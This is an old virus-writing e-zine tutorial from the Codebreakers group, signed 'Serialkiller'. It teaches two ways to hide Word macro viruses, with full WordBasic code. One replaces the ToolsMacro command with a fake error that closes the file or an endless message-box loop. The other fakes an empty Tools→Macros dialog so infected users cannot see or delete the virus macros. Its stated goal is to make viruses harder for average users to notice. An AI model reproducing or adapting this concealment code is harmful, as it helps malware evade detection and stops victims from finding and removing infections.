Serialkiller's Macro Virus Tutorial - Simple Stealth - I will show you two ways to hide macros in a virus. First I will explain a simple routine to hide macros. However the second one is a more effective way to hide a macro. 1. All you have to do is make a macro with the name "ToolsMacro". Normally it will already exist in WinWord. Erase all lines and at the beginning type "SubMain" (All macros beginning with this command), and at the end type "EndSub" (All macros end with this command). Here is some example code which shows how your ToolsMacro macro could look like: SubMain MsgBox "Illegal function in modul 0xCB15C001",32 FileExit EndSub -> SubMain -> The beginning of the macro -> MsgBox "Illegal function in modul 0xCB15C001",32 -> Display a messagebox with some fake error message. -> Number 32 stands for the symbol which is displayed on the left -> side of the message box, in this case it is a "!" -> FileExit -> Closes the current opened file -> EndSub -> The end of this macro Whenever the user clicks on "Tools" followed by "Macros" the new ToolsMacro macro will activate, show him some error message and close the currently opened file. He will not get to see the macros (your virus). Here is another, rather annoying ToolsMacro routine :) Sub MAIN Terror: MsgBox "Hi", 32 Beep Goto Terror End Sub About the symbols, you can change the symbols if you type another number at the end of the line in which you call MsgBox. For example: MsgBox"Hi",32 ... where the last part (32) represents the symbol. If you run the macro it will show you a message box with an "!" on it. Here are the codes for the symbols: 16 stands for a cross red circle with "OK" 17 stands for a cross red circle with "OK" and "Cancel" 18 stands for a cross red circle with "Abort","Retry" and "Cancel" 19 stands for a cross red circle with "Yes","No" and "Cancel" 20 stands for a cross red circle 32 stands for a "!" 34 stands for a "?" with "Abort","Retry" and "Ignore" 37 stands for a "?" with "Retry" and "Cancel" 48 stands for a "!" with "OK" 49 stands for a "!" with "OK","Cancel" 50 stands for a "!" with "Abort","Retry" and "Ignore" 51 stands for a "!" with "Yes","No" and "Cancel" 52 stands for a "!" with "Yes","No" 53 stands for a "!" with "Retry","Cancel" 64 stands for a "I" with "OK" --> I = "Information" 66 stands for a "I" with "Abort","Retry" and "Cancel" 67 stands for a "I" with "Yes","No" and "Cancel" 68 stands for a "I" with "Yes","No" 69 stands for a "I" with "Retry" and a "Cancel" 2. Here is the 2nd way to hide a macro. This routine is used in many viruses, like in MooNRaider, its a far more effective way to hide a macro. Most of the users will not notice that they have a macro virus on their computer. What this will do is generate a total new Tools -> Macros Dialogbox, but one without the macros. ;-) Here is the code: Sub MAIN B$ = "Out of memory." ;it will show at all buttons, except "Cancel" C$ = "WordBasic Err = 7" ;is the heading Dim ComboBox1$(0) ;make the macro box ComboBox1$(0) = "" ;will show NOTHING in the "macro Name" box Dim ListBox1$(0) ;make the macro contents box ListBox1$(0) = "" ;will show nothing in the macro contents box Dim DropListBox2$(0) ;make the list box DropListBox2$(0) = "Normal.dot(Global Template)" ;the list box will show ;Normal.dot (Global Template) A: Begin Dialog UserDialog 442, 320, "Macro" ;make the heading from the box "Macro" CancelButton 290, 38, 141, 21 ;make the "Cancel" and the "Record" button PushButton 290, 14, 141, 21, "Rec&ord...", .D2 ;make the "Record" button PushButton 290, 72, 141, 21, "&Run", .D3 ;make the "Run" button PushButton 290, 97, 141, 21, "&Create", .D4 ;make the "Create" button PushButton 290, 125, 141, 21, "&Delete", .D5 ;make the "Delete" button PushButton 290, 161, 141, 21, "Or&ganizer...", .D6 ;make the "Organizer" button ComboBox 7, 23, 269, 194, ComboBox1$(), .ComboBox1 Text 6, 223, 93, 13, "Macros &Available In:", .T1 Text 7, 259, 109, 13, "Description:", .T2 ;is the heading in the last box "Description" Text 7, 7, 93, 13, "&Macro Name:", .T3 ;is the heading in the first box "Macro Name:" ListBox 7, 276, 425, 38, ListBox1$(), .LB1 ;list it inb the box DropListBox 6, 238, 425, 19, DropListBox2$(), .LB2 ;make the blank field under "Macros" End Dialog ;end dialog Redim dlg As UserDialog x = Dialog(dlg) Select Case x ;select button Case 0 ; Cancel ; Case 1 ; MsgBox B$, C$, 48 ; Goto A ;will take the user back to the box "ToolsMacro" Case 2 ; MsgBox B$, C$, 48 ; Goto A ; by ALL other buttons Case 3 ; you will get the error MsgBox B$, C$, 48 ; message "OUT of MEMORY" Goto A ; and you will get on the Case 4 ; "ToolsMacro" box again MsgBox B$, C$, 48 ; Goto A ; Case 5 ; MsgBox B$, C$, 48 ; Goto A ; End Select ;end select End Sub ;end of the macro I hope this helped you to make your viruses a bit harder to notice by the average user :) If you have question please feel free to write to me. In our next mag I will show you how polymorphism works in word macros :-) --Serialkiller [Codebreakers] xxserialkillerxx@hotmail.com